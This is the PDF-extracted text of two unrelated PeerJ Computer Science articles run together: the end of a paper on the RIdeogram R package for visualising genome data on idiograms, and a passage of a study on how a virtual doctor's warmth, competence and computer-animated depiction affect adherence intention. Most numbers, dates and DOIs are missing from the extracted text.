furthermore, users can also map the continuous data as a heatmap, a line or area chart along the idiograms. in addition, rideogram also provides functions for the visualization of dual and ternary genome synteny using bezier curves on the idiograms. rideogram is available through cran (https://cran.r-project.org/web/packages/ rideogram/) and is developed on github (https://github.com/tickingclock / rideogram). further extensions in development and fixes can be seen in the issue listing page on the package’s github page. the new function that we are planning to implement in next version include, but are not limited to, developing more types of data visualization along the idiograms, visualizing genome synteny for more species and enlarging the hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://cran.r-project.org/web/packages/rideogram/ https://cran.r-project.org/web/packages/rideogram/ https://github.com/tickingclock /rideogram https://github.com/tickingclock /rideogram http://dx.doi.org/ . /peerj-cs. user-specified genome regions to display detailed characteristics, as we gather more from users. examples our first example use the data contained in this package. after the completion of genome sequencing, assembly and annotation, rideogram can be used to give some idea of how genes are distributed across the whole genome. the example data contained numbers of protein-coding genes calculated in -mb windows which can be considered as continues data and positions of random selected non-coding rnas, including ribosomal rnas (rrnas), transfer rnas (trnas) and micrornas (mirnas), which can be considered as discrete data. rideogram maps the gene density information on the idiograms as overlaid features in a heat map and adds track labels next to the idiograms with green boxes, purple circles and orange triangles representing rrnas, trnas and mirnas, respectively (fig. ). obviously, inter- and intra-chromosomal gene distributions are non-uniform. for instance, the chromosomal regions adjacent to the centromeres are gene-poor in chromosome , and while those are gene-rich in chromosome , and . this function can be applied to many different situations, such as single nucleotide polymorphism (snp) density and candidate markers (fig. s & data s , original data see li et al., ), dna methylation dynamics and potential activated genes (fig. s & data s , original data see huang et al., ) and transcription factor (tf) binding sites and candidate target genes (fig. s & data s , original data see shamimuzzaman & vodkin, ). besides visualizing some specific genome characteristics across the whole genome at the chromosome level as showed in fig. , rideogram can also be used to compare two relevant genome features, such as gene and repeat density, which will provide some important implications for better understanding the relevance of chromosomal distribution patterns of these two features. the example data implemented in this package also contained the information of long terminal repeat (ltr) distribution across the human genome. since the transposable elements have been suggested to have a potential detrimental effect on gene expression (hollister & gaut, ), the distributions of gene and ltr are supposed to be opposite across the whole genome as a result of natural selection. as expect, the region that has a relatively high gene content usually has a relatively low ltr density and vice versa (fig. 
s ), indicating that ltr seems to avoid inserting in the regions with a high gene content in the genome. this similar phenomenon was also observed in the sunflower genome explained using two idiogram graphics, one showing the gene distribution and the other showing the ltr distribution (badouin et al., ). using rideogram, users can integrate these two graphics into one, much easier for researchers to interpret and readers to understand. apart from the differences, this function can also be used to show the similarities, like the similar genetic diversity patterns across the whole genome between two geographical groups of the same species, in different label types (fig. s & data s , fig. s , original data see chen et al., ). in addition, rideogram can also be used to show syntenic comparisons between two or three genomes. as shown in fig. , the syntenic blocks between each pair of species, hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure gene distribution across the whole human genome. the overlaid heatmap shows the gene density and the tack labels refer to random selected rnas consisted of rrnas (green boxes), trna (purple circles) and mirna (orange triangles) locus across the human genome. annotation information was downloaded from the gencode website (https://www.gencodegenes.org). full-size doi: . /peerjcs. /fig- which were identified using mcscan (tang et al., ), were plotted. particularly, a typical ancestral region in the basal angiosperm amborella can be tracked to up to two regions in liriodendron and to up to three regions in grape. based on the fact that no lineage-specific polyploidy event has been found in amborella and a whole-genome triplication has been detected in grape, it is reasonable to assume a single liriodendron lineage-specific whole genome duplication event (chen et al., ). furthermore, rideogram allows to visualize a dual genome comparison, such as the genome synteny between human and mouse (fig. s and data s ). compared to autosomes, the syntenic blocks between human and mouse x chromosomes occupy almost the entirety of each x chromosome, suggesting a highly conserved syntenic relationship of the x chromosome within the eutherian mammalian lineage (ross et al., ). hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://www.gencodegenes.org https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. figure syntenic comparison of three plant genomes. genome synteny patterns show that a typical an- cestral region in the basal angiosperm amborella can be tracked to up to two regions in liriodendron and to up to three regions in grape. gray wedges in the background highlight major syntenic blocks spanning more than genes between the genomes (highlighted by one syntenic set shown in colored). full-size doi: . /peerjcs. 
/fig- conclusion the rideogram package provides an efficient and effective way to build idiograms with no species limitations and map genome-wide information on the idiograms for better visualizing and understanding the chromosomal distribution patterns of some particular genomic features. meanwhile, this package can be also used to visualize syntenic analysis between genomes. additionally, it is user-friendly and accessible for biologists without extensive computer programming expertise. finally, rideogram can generate two types of images, a vector graphic or a bitmap file, both in high-quality and meeting conventional requirements for direct use in presentations or journal publications. hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. acknowledgements we thank dr. zhongjuan zhang for her comments on the manuscript. additional information and declarations funding this work was supported by the key research and development plan of jiangsu province (be ), the foundation of jiangsu forestry bureau (lykj[ ] ), the qinglan project of jiangsu province and the priority academic program development of jiangsu higher education institutions (papd). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: key research and development plan of jiangsu province: be . foundation of jiangsu forestry bureau: lykj[ ] . qinglan project of jiangsu province. priority academic program development of jiangsu higher education institutions (papd). competing interests the authors declare there are no competing interests. author contributions • zhaodong hao conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • dekang lv performed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. • ying ge performed the experiments, performed the computation work, authored or reviewed drafts of the paper, typeset the code, and approved the final draft. • jisen shi and dolf weijers performed the experiments, authored or reviewed drafts of the paper, and approved the final draft. • guangchuang yu and jinhui chen conceived and designed the experiments, performed the computation work, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data and codes are available at github: https://github.com/tickingclock / rideogram. hao et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/tickingclock /rideogram https://github.com/tickingclock /rideogram http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references anand l. . chromomap: interactive visualization and mapping of chromosomes. biorxiv doi . / . 
the doctor's digital double: how warmth, competence, and animation promote adherence intention
zhengyan dai* and karl f. macdorman*
school of informatics and computing, indiana university, indianapolis, in, usa
* these authors contributed equally to this work.

abstract
background: each year, patient nonadherence to treatment advice costs the us healthcare system more than $ billion and results in , deaths. developing virtual consultations to promote adherence could improve public health while cutting healthcare costs and usage. however, inconsistencies in the realism of computer-animated humans may cause them to appear eerie, a phenomenon termed the uncanny valley. eeriness could reduce a virtual doctor's credibility and patients' adherence.
methods: in a 2 × 2 × 2 between-groups posttest-only experiment, participants played the role of a patient in a hypothetical virtual consultation with a doctor. the consultation varied in the doctor's character (good or poor bedside manner), outcome (received a fellowship or sued for malpractice), and depiction (a recorded video of a real human actor or of his 3d computer-animated double). character, outcome, and depiction were designed to manipulate the doctor's level of warmth, competence, and realism, respectively.
results: warmth and competence increased adherence intention and consultation enjoyment, but realism did not. on the contrary, the computer-animated doctor increased adherence intention and consultation enjoyment significantly more than the doctor portrayed by a human actor. we propose that enjoyment of the animated consultation caused the doctor to appear warmer and more real, compensating for his realism inconsistency. expressed as a path model, this explanation fit the data.
discussion: the acceptance and effectiveness of the animation should encourage the development of virtual consultations, which have advantages over creating content with human actors, including ease of scenario revision, internationalization, localization, personalization, and web distribution.
subjects human-computer interaction, agents and multi-agent systems, graphics, multimedia, social computing
keywords adherence, anthropomorphism, avatars, computer animation, doctor–patient simulations, health literacy, interactive narratives, uncanny valley
how to cite this article dai z, macdorman kf. . the doctor's digital double: how warmth, competence, and animation promote adherence intention. peerj comput. sci. :e doi . /peerj-cs. submitted august ; accepted september ; published november . corresponding author: karl f. macdorman, kmacdorm@indiana.edu. academic editor: julita vassileva. additional information and declarations can be found on page . copyright dai and macdorman, distributed under creative commons cc-by .

introduction
the persuasiveness of a message depends on its source, content, and the extent to which it is processed systematically or heuristically (chaiken, ; van der heide & schumaker, ). systematic processing assesses the content of a message, while heuristic processing assesses features unrelated to content. when the message source is another human, features affecting persuasion include physical appearance, perceived character traits, and behavior (wood, solomon & englis, ). for character traits, the primary dimension of interpersonal perception is warmth, and the secondary dimension is competence (cuddy, fiske & glick, ; fiske et al., ). warmth indicates the intention to help or harm others, and competence indicates the capacity to do so (fiske, cuddy & glick, ). competence and facets of warmth, like goodwill and trustworthiness, have been used extensively to assess source credibility (mccroskey & teven, ; mcginnies & ward, ); they are important in the literature on persuasion because credible sources are more persuasive (jain & posavac, ; maddux & rogers, ; pornpitakpan, ; sertoglu, catl & korkmaz, ).
persuasive strategies that increase perceived warmth and competence have been investigated in doctor–patient consultations (cousin, mast & jaunin-stalder, ; janssen & lagro-janssen, ). patients' perception of their doctor's warmth and competence increases adherence, that is, clinically unsupervised compliance with treatment advice. communication strategies that express warmth lead patients to perceive their doctor as caring, understanding, and empathic; thus, patients prefer these strategies (cousin et al., ; mast, hall & roter, ; o'hair, ; o'hair et al., ). the perception of a doctor's empathy and competence (which includes expertise) increases patients' satisfaction with and adherence to treatment advice (kim, kaplowitz & johnston, ; ohana & mash, ; willson & mcnamara, ). while satisfaction with communication increases adherence, dissatisfaction has the opposite effect (burgoon et al., ; marple et al., ). warmth and competence improve patients' prognosis and quality of life by increasing adherence (bennett et al., ; borel et al., ; swain et al., ). warmth, competence, attractiveness, and other factors affecting source credibility apply to virtual as well as real humans (garau et al., ; keeling, mcgoldrick & beatty, ).
virtual humans offer a familiar interface that can be used to change people's beliefs, attitudes, intentions, and behaviors (jin & sung, ; peña & yoo, ) while disseminating professional advice. along with the content of a message, virtual humans deliver nonverbal cues about warmth and competence (an et al., ; anam, andrade & ruiz, ; tongpeth, du & clark, ). these cues reduce the receiver's uncertainty during communication and support decision-making (burgoon & hale, ; burgoon & walther, ). a virtual human's nonverbal cues enable the experience of social presence, relatedness, and affinity (bente et al., ), an experience that precedes interpersonal trust (cyr et al., ).
although both real and virtual humans vary in form, behavior, and interactivity, virtual humans also vary in human realism (bailenson et al., ). designing perfectly or even consistently realistic virtual humans is an unsolved challenge (chattopadhyay & macdorman, ; gilbert & forney, ). we assume that all present-day virtual humans are realism inconsistent because the goal of realism is human indistinguishability, and the degree to which it is attained will vary with the difficulty of making each feature indistinguishable. features that have been experimentally contrasted in realism include face and eyes (macdorman et al., ; seyama & nagayama, ) and voice and body (mitchell et al., ). a literature review concluded that features inconsistent in their realism elicit feelings of eeriness (kätsyri et al., ), a phenomenon known as the uncanny valley (mathur & reichling, ; moore, ; mori, ). eeriness could function like other negative evaluations to reduce source credibility.
thus, a fundamental problem with virtual humans is that, while delivering intended warmth and competence cues, they also deliver unintended cues about inconsistent realism (chattopadhyay & macdorman, ). these unintended cues may negate the positive effects of warmth and competence cues on persuasion. specifically, a virtual doctor's realism and potential for eeriness might affect a patient's intention to adhere to treatment advice by influencing the virtual doctor's persuasiveness relative to a real human. as this topic has not been studied empirically, the present study is intended to fill this gap.
despite their differences, a virtual human could be as persuasive as a real human (patel & macdorman, ; zanbaka, goolkasian & hodges, ), or even more persuasive (bickmore, pfeifer & paasche-orlow, ). however, raij et al. ( ) found that a virtual patient induced less empathy and rapport-building and worse attitudes in doctors than a real patient. although these studies investigated the effect of realism on persuasion, only one employed an experimentally controlled stimulus, that is, a digital double (patel & macdorman, ). moreover, the ways in which warmth, competence, realism, and eeriness together affect adherence intention in a hypothetical virtual consultation have not been investigated.
based on the finding that warmth, including its goodwill and trustworthiness facets, and competence increase a source's persuasiveness in both real and virtual environments, we hypothesized that (h1) a high-warmth source will be more persuasive than a low-warmth source and (h2) a high-competence source will be more persuasive than a low-competence source.
in the virtual consultation, the high-warmth source was portrayed as a doctor with good bedside manner and the low-warmth source was portrayed as a doctor with poor bedside manner; the high-competence source was portrayed as a doctor who would, at the end of the consultation, receive a fellowship, and the low-competence source was portrayed as a doctor who would instead be sued for malpractice (videos: doi . /m .figshare. ).
in research on how physical appearance influences persuasion, attractiveness has been the most widely investigated dimension. attractiveness increases persuasiveness (chaiken, ; holzwarth, janiszewski & neumann, ; jin & bolebruch, ; joseph, ; khan & sutcliffe, ; lacrosse, ; pallak, ; pallak, murroni & koch, ), though with exceptions (skalski & tamborini, ). we would expect inconsistent realism and eeriness to have the opposite effect. nevertheless, patel & macdorman ( ) found that although an animated character was more eerie, less attractive, and less human than its real counterpart, it did not reduce the intention to comply with advice. based on the assumption that flaws in realism cause negative affective evaluations, namely, eeriness that decreases source credibility, we hypothesized that (h3) a high-realism source will be more persuasive than a low-realism source. in the virtual consultation, the high-realism source was the doctor depicted by a real human actor and the low-realism source was the doctor depicted by the actor's computer-animated double (fig. ).
the future success of virtual consultations depends on patients' willingness to accept this new technology. to this end, our study also aims to investigate the ways in which the message source's warmth, competence, and realism influence the enjoyment of the virtual consultation. smiling and other nonverbal cues indicating warmth and social presence have been found to increase enjoyment and trust when interacting with virtual human characters (guadagno, swinth & blascovich, ; qiu & benbasat, ). whether virtual or real, given that a doctor's warmth and competence increase patient satisfaction (kim, kaplowitz & johnston, ; ohana & mash, ; willson & mcnamara, ), we hypothesized that the consultation will be more enjoyable (h4) with the high-warmth source than with the low-warmth source and (h5) with the high-competence source than with the low-competence source.
computer animation can often be more enjoyable than reality. for example, virtual human characters can increase satisfaction more than real people (bickmore, pfeifer & paasche-orlow, ). however, the characters tested were typically less realistic than the human model employed in this study and thus, according to mori's ( ) uncanny valley hypothesis, were less likely to appear eerie.
figure: the real human actor and his digital double used in the experiment. in the role of a patient in a hypothetical virtual consultation, the participant interacted with a doctor. a 2 × 2 × 2 between-groups posttest-only experimental design was used. the doctor's character was good or poor bedside manner, outcome was received a fellowship or sued for malpractice, and depiction was a recorded video of a real human actor or of his 3d computer-animated double. character, outcome, and depiction were designed to manipulate the doctor's level of warmth, competence, and realism, respectively. full-size doi: . /peerj-cs. /fig-
nevertheless, animation realism can increase a virtual character's appeal, and even uncanniness can elicit positive affect, as exhibited by facial expressions and self-reports (kokkinara & mcdonnell, ; mäkäräinen et al., ). leaving open the direction of the effect, we hypothesized that (h6) realism will influence the enjoyment of the virtual consultation.

methods
the experiment was set up as a web-based interactive visual narrative. participants, playing the patient, selected responses to a video of a dramatic character playing the doctor in a hypothetical virtual consultation. the doctor's bedside manner, personal outcome, and depiction were manipulated to examine whether warmth, competence, and realism, respectively, increase adherence intention and enjoyment, and whether eeriness decreases adherence intention and enjoyment. warmth was manipulated through the scripted narrative: the doctor's spoken words, voice and prosody, facial expressions, and body movements. competence was manipulated through a subplot culminating in the doctor being either honored with a fellowship or sued for malpractice. realism was manipulated by using a recorded video of either a real actor playing the doctor in a consultation room or computer-animated models simulating the same scenario.

participant characteristics and sampling
the sample comprised randomly selected undergraduate and graduate students, age or older, from a midwestern us public university system. participation was voluntary, and testing was conducted at a time and location chosen by the participant. the study was approved by the indiana university office of research administration (january , , ohrp category , study no. ). informed consent was obtained from all participants. documentation of informed consent was waived under cfr . (c) or cfr . (c)( ). explanation of aspects of the experiment that could have affected its outcome was delayed until after participation under cfr . (d). the research was performed in accordance with all relevant federal, state, and university standards, policies, and regulations on human subjects research.

research design
the experiment had a 2 × 2 × 2 between-groups posttest-only design (independent variables). each participant was randomly assigned to one of eight treatment groups, each representing a low or high level of warmth, competence, and realism. a brief illustrative sketch of this assignment appears below, after the procedure.

procedure
after providing demographic information and reading introductory text, each participant assumed the role of a patient in a virtual consultation (appendix a: script). the consultation began with the patient's blood sugar testing higher than normal. dr. richards appeared in a video wearing a white shirt, tie, and lab coat with a stethoscope draped over his shoulders. he was standing and holding a clipboard with the patient's test results. the consultation proceeded through seven hypothetical doctor–patient exchanges and a final reply from the doctor. in each doctor–patient exchange, the participant replied to the doctor by choosing one of four text-based responses.
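the design and procedure above amount to randomly assigning each participant to one of the eight cells formed by crossing character, outcome, and depiction. the r sketch below illustrates that assignment under stated assumptions; the seed, sample size, and level labels are hypothetical and are not taken from the study.

```r
# illustrative sketch only (not the authors' code): random assignment to the
# eight cells of the 2 x 2 x 2 between-groups design described above.
set.seed(2019)                                     # arbitrary seed for reproducibility
cells <- expand.grid(
  character = c("good manner", "poor manner"),     # warmth manipulation
  outcome   = c("fellowship", "malpractice"),      # competence manipulation
  depiction = c("real video", "computer animated") # realism manipulation
)
n <- 560                                           # hypothetical sample size
assignment <- cells[sample(seq_len(nrow(cells)), n, replace = TRUE), ]

# check how many participants land in each character-by-depiction cell
addmargins(table(assignment$character, assignment$depiction))
```

simple randomization like this can leave the eight cells slightly unequal in size; the final table call makes any imbalance visible.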
to maintain experimental control, the doctor's statements were phrased to follow logically from any of the preceding responses. after the consultation, the participant completed a questionnaire for the posttest indices (dependent variables).

independent variables
the independent variables were character, outcome, and realism. each variable had a high and a low level. these constituted the eight treatment conditions.

character
dr. richards' character was reflected in his bedside manner, which was either good or poor. character was represented by approximately % of the doctor's dialogue. the good-manner treatments included expressions of caring, encouragement, praise, and confidence in the patient and treatment, offers of availability and support, and recommendations of external resources. the poor-manner treatments included complaining about others, using disparaging and offensive language, showing a lack of availability, demeaning and discouraging the patient, cracking a joke at the patient's expense, and assuming the patient had petrifying fears and ingrained habits. dr. richards' remaining dialogue ( of – words) was identical between the good-manner and poor-manner conditions. in this dialogue, dr. richards interpreted the patient's test results as possibly indicating diabetes and invited the patient for a retest. he also explained type and type diabetes and their symptoms, complications, biological mechanism, and treatments.

outcome
dr. richards' outcome was either a fellowship or a malpractice lawsuit. a high- and low-competence subplot was set up immediately before the virtual consultation. first, the participant overheard another patient in the waiting room discussing a malpractice lawsuit; subsequently, the nurse called the patient back and mentioned that the doctor was up for an award. these events were framed more or less favorably in the high- or low-competence versions, respectively. the subplot culminated at the end of the consultation. in the high-competence condition, nurse larsson announced, "great news, dr. richards! the american college of physicians is honoring you with a fellowship!" in the low-competence condition, nurse larsson announced, "bad news, dr. richards! meredith pratley decided to go ahead with the malpractice lawsuit."

depiction
the depiction of the entire virtual consultation was either real or computer animated; however, both versions used the same recording, namely, the voice of the actor playing dr. richards and of the off-screen actress playing nurse larsson. the high-realism treatment used a recorded video of the actor (fig. ). the low-realism treatment used a video of a computer model developed from high-resolution reference photographs of the same actor. the actor's clothing, props, and environment were all developed the same way. the computer models were animated manually using the real video as a reference. the animated dr. richards' lips were synchronized to the real actor's speech. the affective lip and eyebrow movements were precisely synchronized to the video by hand but appeared less emphatic. the same computer model had been used in a different scenario and found to be significantly more eerie than the real actor (patel & macdorman, ).

dependent variables
the semantic differential scales comprising the posttest indices are listed in appendix b.
the indices represent unweighted averages of interval measurements from their respective semantic differential scales. the scales were implemented as visual analogue scales (funke & reips, ; reips & funke, ). each scale was represented by an adjective (or phrase) and its antonym on opposite ends of a horizontal bar. the participant placed a mark on the bar, and depending on where the mark was placed, a decimal value between - . and . was recorded for that scale. likert scales were also implemented as visual analogue scales with strongly disagree and strongly agree on opposite ends of the horizontal bar. index and scale order were randomized.

warmth and competence
dr. richards' warmth and competence were measured using three source credibility indices (mccroskey & teven, ): goodwill, trustworthiness, and competence. goodwill and trustworthiness formed a single warmth index.

human realism and eeriness
dr. richards' human realism and eeriness were measured using three source appearance indices: realism, humanness, and eeriness (ho & macdorman, ). realism and humanness formed a single human realism index.

adherence intention
intention to adhere to dr. richards' treatment advice was measured using an index designed specifically for this virtual consultation.

enjoyment
narrative appreciation of the consultation was measured using an enjoyment index. to design the enjoyment index, the program evaluation index (perry et al., ) was converted from intensity scales to semantic differential scales by adding antonyms.

results
participants
overall, participants randomly assigned to eight groups, with – in each group, completed the experiment ( % female, n = ). as a manipulation check, a subset of participants, with – in each group, completed additional items measuring source credibility and appearance ( . % female, n = ).

recruitment period and baseline
the experiment was conducted from january to march , . most participants grew up in the us ( %, n = ). they ranged in age from to (mdn = , iqr = ( , )).

data analysis preliminaries
test statistics were two-tailed and interpreted at a . significance level. partial eta squared (ηp²) was interpreted with small = . , medium = . , and large = . thresholds (cohen, ), and cronbach's α with acceptable = . , good = . , and excellent = . thresholds. factor analysis used oblimin rotation and parallel analysis to determine the number of factors. all betas (β) were standardized. correlations and path analysis of the structural models were performed in lavaan . , and other analyses in jamovi . .

index reliability
goodwill and trustworthiness scales loaded on the same factor and together comprised warmth. realism and humanness scales loaded on the same factor and together comprised human realism. three scales not contributing to reliability were removed: without definite lifespan—mortal was removed from human realism, uninspiring—spine-tingling was removed from eeriness, and item was removed from adherence intention (appendix b). the revised human realism, eeriness, and adherence intention indices were used in the analyses. all indices showed internal reliability (table ). a minimal reliability sketch in r is given below.

manipulation checks
as described below, the manipulation checks found that warmth, competence, and human realism varied as expected; however, character also increased competence and decreased eeriness.
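the index construction and reliability analysis described under data analysis preliminaries and index reliability above follow a standard psychometric workflow: parallel analysis and factor analysis with oblimin rotation, cronbach's α, and unweighted averaging of the retained items. the r sketch below illustrates that workflow under assumed names; the data frame warmth_items and its columns are hypothetical, and this is not the authors' supplemental code.

```r
# minimal sketch, assuming a data frame `warmth_items` whose columns are the
# goodwill and trustworthiness scales, already scored so that higher = warmer
library(psych)

# parallel analysis to decide how many factors to retain
fa.parallel(warmth_items, fa = "fa")

# exploratory factor analysis with oblimin rotation, as in the paper
fa(warmth_items, nfactors = 1, rotate = "oblimin")

# internal consistency of the index (cronbach's alpha)
alpha(warmth_items)

# the index itself: an unweighted average of the item scores
warmth_index <- rowMeans(warmth_items, na.rm = TRUE)
```

the same pattern applies to the other indices; items keyed in the reverse direction (marked r in appendix b) would be reflected before averaging.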
depiction had a nonsignificant effect on eeriness, thus indicating that the eeriness manipulation check was unsuccessful. using pillai’s trace, a three-way manova found a significant effect of character, v = . , f( , ) = . , p < . , and depiction, v = . , f( , ) = . , p < . , on the manipulation check variables. separate univariate anovas were conducted to test the main and interaction effects of character, outcome, and depiction on warmth, competence, human realism, and eeriness (table ). character had a significant main effect on warmth, competence, and eeriness with large effect sizes. post hoc tests (tukey’s hsd) showed that the good-manner doctor was rated significantly higher than the poor-manner doctor on warmth and competence and significantly lower on eeriness. character � outcome interaction effect on competence was significant with a small effect size, ss = . , f = . , p = . , h p = . . table psychometric properties of the dependent variables. dv items n m sd α skew warmth - . . . . competence . . . – . human realism - . . . . eeriness - . . . . adherence intention . . . – . enjoyment - . . . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ outcome had a significant effect on competence with a small effect size. the high-competence doctor (awarded fellowship) was rated significantly higher than the low-competence doctor (malpractice lawsuit) on competence. depiction had a significant effect on human realism with a medium effect size but a nonsignificant effect on eeriness. the high-realism doctor was rated higher than the low-realism on human realism. regression analysis multiple linear regression was performed to predict adherence intention from warmth, competence, human realism, eeriness, and enjoyment. although the first model was significant, f( , ) = . , p < . , r = . , adj. r = . , enjoyment was nonsignificant, t = . , p = . , β = . , and it was removed from the second model. furthermore, the second model was significant, f( , ) = . , p < . , r = . , adj. r = . , but human realism was nonsignificant, t = - . , p = . , β = - . , and it was removed from the third model, which had the best fit, f( , ) = . , p < . , r = . , adj. r = . (table ). warmth and competence predicted adherence intention with medium-to-large effect sizes while eeriness inversely predicted adherence intention with a small effect size. hypotheses testing using pillai’s trace, a three-way manova found a significant effect of character, v = . , f( , ) = . , p < . , depiction, v = . , f( , ) = . , p < . , and outcome, v = . , f( , ) = . , p = . on dependent variables. separate univariate anovas were conducted to test the main and interaction effects of character, outcome, and depiction on adherence intention and enjoyment. all main effects were significant (table ). no significant interaction effects were found. table anovas of character, outcome, and depiction on warmth, competence, human realism, and eeriness. iv dv ss f p ηp mdiff se df t ptukey character warmth . . < . . . . . < . competence . . < . . . . . < . human realism . . . eeriness . . < . . – . . – . < . outcome warmth . . . competence . . . . . . . . human realism . . . eeriness . . . depiction warmth . . . competence . . . human realism . . < . . – . . – . < . eeriness . . . note: n = . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
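the manipulation checks, hypothesis tests, and the later path analysis reported under secondary analysis all follow standard workflows (the paper reports using jamovi and lavaan). the sketch below illustrates the general pattern in r under assumed, hypothetical variable names; the data frame `d`, its columns, and the path-model edges are reconstructions for illustration, not the authors' supplemental code.

```r
# minimal sketch under assumed names: `d` has one row per participant, with
# factors character, outcome, depiction and numeric indices warmth, competence,
# eeriness, enjoyment, human_realism, and adherence

# three-way anova with tukey's hsd post hoc test; the manipulation checks and
# hypothesis tests follow this pattern for each dependent variable
fit_aov <- aov(adherence ~ character * outcome * depiction, data = d)
summary(fit_aov)
TukeyHSD(fit_aov, which = "character")

# multiple regression predicting adherence intention; the paper's later models
# drop nonsignificant predictors (enjoyment, then human realism)
fit_lm <- lm(adherence ~ warmth + competence + eeriness, data = d)
summary(fit_lm)

# path analysis of the kind reported under secondary analysis, fit with lavaan;
# depiction is assumed to be coded numerically (e.g., 0 = animated, 1 = real),
# and the edges below are a plausible reconstruction from the text, not the
# authors' exact final model
library(lavaan)
path_model <- '
  enjoyment     ~ depiction
  human_realism ~ depiction + enjoyment
  eeriness      ~ human_realism
  warmth        ~ eeriness + enjoyment
'
fit_sem <- sem(path_model, data = d)
summary(fit_sem, fit.measures = TRUE, standardized = TRUE)
fitMeasures(fit_sem, c("pvalue", "rmsea", "rmsea.ci.lower",
                       "rmsea.ci.upper", "cfi", "srmr"))
```

the fit measures requested in the last call match the global fit criteria the paper applies to its path models: the exact-fit p-value, rmsea with its confidence interval, cfi, and srmr.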
https://peerj.com/computer-science/ h predicted that the high-warmth source will be more persuasive than the low-warmth source. the main effect of character on adherence intention was significant and large. in the narrative, intention to adhere to the treatment advice of the doctor with good bedside manner was greater than intention to adhere to the treatment advice of the doctor with poor bedside manner (fig. ). thus, h was supported. h predicted that the high-competence source will be more persuasive than the low-competence source. the main effect of outcome on adherence intention was significant but small. intention to adhere to the treatment advice of the doctor awarded the fellowship was greater than intention to adhere to the treatment advice of the doctor sued for malpractice. thus, h was supported. table regression model coefficients for adherence intention. predictor b se β t p intercept . . . < . warmth . . . . < . competence . . . . < . eeriness - . . - . – . . note: n = . table anovas of character, outcome, and depiction on adherence intention and enjoyment. iv dv ss f p ηp mdiff se df t ptukey character adherence intention . . < . . . . . < . enjoyment . . < . . . . . < . outcome adherence intention . . . . . . . . enjoyment . . . . . . . . depiction adherence intention . . . . . . . . enjoyment . . < . . . . . < . note: n = . depiction ( % ci) computer animated real – . . . . good manner character a d h er en ce in te n ti o n poor manner good manner character en jo ym en t poor manner – . – . – . – . a b figure means and % confidence intervals of adherence intention and enjoyment plotted by character and depiction. adherence intention (a) and consultation enjoyment (b) were sig- nificantly greater for the doctor with good bedside manner than the doctor with poor bedside manner. full-size doi: . /peerj-cs. /fig- dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ h predicted that the high-realism source will be more persuasive than the low- realism source. it should be noted that the realism manipulation check was successful, but the eeriness manipulation check was not. the main effect of depiction on adherence intention was significant but small. intention to adhere to the advice of the computer- animated doctor was greater than intention to adhere to the advice of the doctor portrayed by a real human actor. thus, h was not supported. h predicted that the consultation will be more enjoyable with the high-warmth source than the low-warmth source. the main effect of character on enjoyment was significant but small. the consultation with the doctor with good bedside manner was more enjoyable. thus, h was supported. h predicted that consultation will be more enjoyable with the high-competence source than the low-competence source. the main effect of outcome on enjoyment was significant but small. the consultation was more enjoyable with the doctor awarded the fellowship. thus, h was supported. h predicted that realism will influence enjoyment of the virtual consultation. the main effect of depiction on enjoyment was significant but small. the consultation with the computer-animated doctor was more enjoyable. thus, h was supported. secondary analysis depiction (high realism) was predicted to reduce eeriness; however, the results revealed that depiction actually reduced enjoyment and that character (good manner) reduced eeriness. 
surprisingly, depiction and eeriness were uncorrelated (table ). to explain this, we proposed that enjoyment of the consultation with the computer- animated dr. richards interfered with the measurement of eeriness. however, this interference appeared to be indirect because, although enjoyment and eeriness were significantly correlated, only human realism and warmth were significant predictors of eeriness in a regression model. similarly, only eeriness and enjoyment were significant predictors of warmth; only warmth, human realism, and depiction were significant predictors of enjoyment; and only enjoyment, eeriness, and depiction were significant predictors of human realism. each of these four regression models can be represented by a causal directed graph with an arrow from each predictor variable to the outcome variable. each of these four graphs could contribute variables and edges to a table correlations for analysis of path models of warmth. variables warmth eeriness enjoyment human realism depiction warmth — eeriness - . *** — enjoyment . *** - . ** — human realism . *** - . *** . *** — depiction - . * . - . ** . *** — notes: n = . * p < . . ** p < . . *** p < . . dai and macdorman ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ larger directed graph. thus, the variables and edges of these graphs identified the potential set of path models we sought to analyze by structural equation modeling. a direct effect, represented by an arrow, is a hypothesized relation between two variables. the strength of this relation is a free parameter, which is estimated during model identification. the absence of an arrow between two variables is a fixed parameter (fixed to ). a nonsignificant p-value of a free parameter indicates poor local fit. an upper bound on the number of free parameters was set at by applying the n:q rule, which recommends a minimum : ratio of sample size to free parameters (jackson, ). by the parsimony principle, we specified the simplest model with the highest priority effect first and then proceeded to specify more complex models as necessary by adding direct effects (kline, ). the simplest model, model , had a direct effect from the independent variable depiction to 